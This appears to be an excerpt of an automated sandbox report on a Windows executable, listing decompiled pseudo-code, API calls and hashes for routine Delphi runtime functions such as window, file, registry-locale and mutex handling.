                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                          • Opcode ID: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                                                                                                                                                          • Instruction ID: a8a80a8af59d526015255caeaaeb12d1c6418dce9794d9929da9e8c0ec6d85c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74274540d8a19cde7bb523b451448ef3b9ce779965eea58d91458e7d4c1449b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045A28C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 268 45a28c-45a2ac 269 45a2ae-45a2c2 call 45a240 call 404dcc 268->269 270 45a2eb-45a2f3 call 404a14 268->270 279 45a2c4-45a2cb 269->279 280 45a2cd-45a2e4 call 404e80 SetWindowTextA call 4049c0 269->280 274 45a2f8-45a30d call 4049c0 270->274 279->274 279->280 284 45a2e9 280->284 284->274
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E0045A28C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t40;
				char _t41;

				_push(0);
				_t37 = __edx;
				_t27 = __eax;
				_push(_t40);
				_push(0x45a30e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40;
				_t41 =  *((char*)(__eax + 0xa4));
				if(_t41 == 0) {
					_t7 = _t27 + 0x8c; // 0x8c
					E00404A14(_t7, __edx);
				} else {
					E0045A240(__eax,  &_v8);
					E00404DCC(_v8, _t37);
					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
						SetWindowTextA( *(_t27 + 0x30), E00404E80(_t37));
						_t6 = _t27 + 0x8c; // 0x8c
						E004049C0(_t6);
					}
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0045A315);
				return E004049C0( &_v8);
			}








                                                                                                                                                                                          0x0045a28f
                                                                                                                                                                                          0x0045a293
                                                                                                                                                                                          0x0045a295
                                                                                                                                                                                          0x0045a299
                                                                                                                                                                                          0x0045a29a
                                                                                                                                                                                          0x0045a29f
                                                                                                                                                                                          0x0045a2a2
                                                                                                                                                                                          0x0045a2a5
                                                                                                                                                                                          0x0045a2ac
                                                                                                                                                                                          0x0045a2eb
                                                                                                                                                                                          0x0045a2f3
                                                                                                                                                                                          0x0045a2ae
                                                                                                                                                                                          0x0045a2b3
                                                                                                                                                                                          0x0045a2bd
                                                                                                                                                                                          0x0045a2c2
                                                                                                                                                                                          0x0045a2d9
                                                                                                                                                                                          0x0045a2de
                                                                                                                                                                                          0x0045a2e4
                                                                                                                                                                                          0x0045a2e4
                                                                                                                                                                                          0x0045a2c2
                                                                                                                                                                                          0x0045a2fa
                                                                                                                                                                                          0x0045a2fd
                                                                                                                                                                                          0x0045a300
                                                                                                                                                                                          0x0045a30d

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0045A240: GetWindowTextA.USER32 ref: 0045A263
                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0045A2D9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 530164218-0
                                                                                                                                                                                          • Opcode ID: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                                                                                                                                                          • Instruction ID: 29e0112d14c0054e859a686d8a752fc0bc116d16f21071392ac3c9ea7363cd22
                                                                                                                                                                                          • Opcode Fuzzy Hash: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                                                                                                                                                          • Instruction Fuzzy Hash: E001D4B06006049BD701EB65C842B5A72A8AB88704F5042B7FD0497383D63C9D59866E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407AE4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				long _v8;
				void* _t12;
				struct HWND__* _t22;
				long _t27;
				CHAR* _t30;

				_v8 = _t27;
				_t30 = __eax;
				_t12 = E00402C0C();
				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00402BFC(_t12);
				return _t22;
			}








                                                                                                                                                                                          0x00407aeb
                                                                                                                                                                                          0x00407af0
                                                                                                                                                                                          0x00407af2
                                                                                                                                                                                          0x00407b21
                                                                                                                                                                                          0x00407b2a
                                                                                                                                                                                          0x00407b36

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                                                          • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                          • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405F94 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00405F94(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E004061D0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








                                                                                                                                                                                          0x00405f9c
                                                                                                                                                                                          0x00405fa2
                                                                                                                                                                                          0x00405fb2
                                                                                                                                                                                          0x00405fbb
                                                                                                                                                                                          0x00405fc0
                                                                                                                                                                                          0x00405fc2
                                                                                                                                                                                          0x00405fc7
                                                                                                                                                                                          0x00405fcc
                                                                                                                                                                                          0x00405fcc
                                                                                                                                                                                          0x00405fc7
                                                                                                                                                                                          0x00405fda

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                                                                                                                                                            • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                            • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                            • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                                                                                                                                                            • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                            • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                            • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                            • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                                                                          • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                          • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409974 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00409974(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                                                                                                                                                          0x00409977
                                                                                                                                                                                          0x00409988
                                                                                                                                                                                          0x0040998f
                                                                                                                                                                                          0x00409991
                                                                                                                                                                                          0x00409991
                                                                                                                                                                                          0x0040999f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                          • Instruction ID: 0d5b49b13c8f4389bf346f82ff244d5682fd19cf5393362de481199118583149
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: BDD05BB63091107AD220955F9C44DEB5BDCCBC6771F104B3EB598D32C1D6348C018375
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409A58 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409A58(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                                                                                                          0x00409a63
                                                                                                                                                                                          0x00409a6b
                                                                                                                                                                                          0x00409a74
                                                                                                                                                                                          0x00409a75
                                                                                                                                                                                          0x00409a78
                                                                                                                                                                                          0x00409a78

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00409A63
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                                                                                                                                                          • Instruction ID: b45727f5bee9a1b88d075e34cfdcfeb0f7af153fe39d01b3b8471be6c8c36cfb
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC08CB1B092002ADE5061FD1CC2A0B42C80A442387602B3BF47EF23D3E23DAC162418
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406F8E Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00406F8E(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                                                                                                                                          0x00406f93
                                                                                                                                                                                          0x00406f9b
                                                                                                                                                                                          0x00406fa6
                                                                                                                                                                                          0x00406fac

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateMutex
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1964310414-0
                                                                                                                                                                                          • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                                                                                                                                          • Instruction ID: 98e81aead139b17a815cef7455711068e9fc67f306ce3b3ca14eba37014c667d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76D0127325024DAFCB00EEBDDC05DAB33DC9728609B408425B929C7100D139E9508B60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040991C Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040991C(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}




                                                                                                                                                                                          0x00409939
                                                                                                                                                                                          0x0040993f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00409939
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                                                                                                                                                          • Instruction ID: 060bc272a188b5da0ac96ce548da9ccbd18b50796637518aaa4824f3fdc661df
                                                                                                                                                                                          • Opcode Fuzzy Hash: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DC092B03C030032F93021B62C8BF26004C2744F18FA2853AB785FE1C3C8E9B818015C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409F52 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00409F52(void* __eax) {
				int _t4;

				_t4 = CreateDirectoryA(E00404E80(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                                                                                                                                          0x00409f61
                                                                                                                                                                                          0x00409f69
                                                                                                                                                                                          0x00409f6d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00409F61
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4241100979-0
                                                                                                                                                                                          • Opcode ID: da0a1cb6a91108466478a13c7ec01f26269b5eba67ab84bfcee74794120e577a
                                                                                                                                                                                          • Instruction ID: 317bec396417f6fd3dba37d8f29f6816ba51de73adf5360c2fdabea52b4e65d8
                                                                                                                                                                                          • Opcode Fuzzy Hash: da0a1cb6a91108466478a13c7ec01f26269b5eba67ab84bfcee74794120e577a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42C092A27503412AEE0035FA2CC2B3A008CE74861AF110A3EFA56E61C2E47ACC184068
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409A7C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409A7C(void* __eax) {
				long _t4;

				_t4 = GetFileAttributesA(E00404E80(__eax)); // executed
				return _t4;
			}




                                                                                                                                                                                          0x00409a87
                                                                                                                                                                                          0x00409a8d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00409A87
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                                                                                                                                                          • Instruction ID: 67a43f86abe4dd1ef5a5c4911a27f769ef87cc39f57c29bfc39dbdecf4d4660c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58A011C0B0020022CA0032FA2CC2A0A00CC2B882283800A3EB208E2283E83CA808002C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0049AB80 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
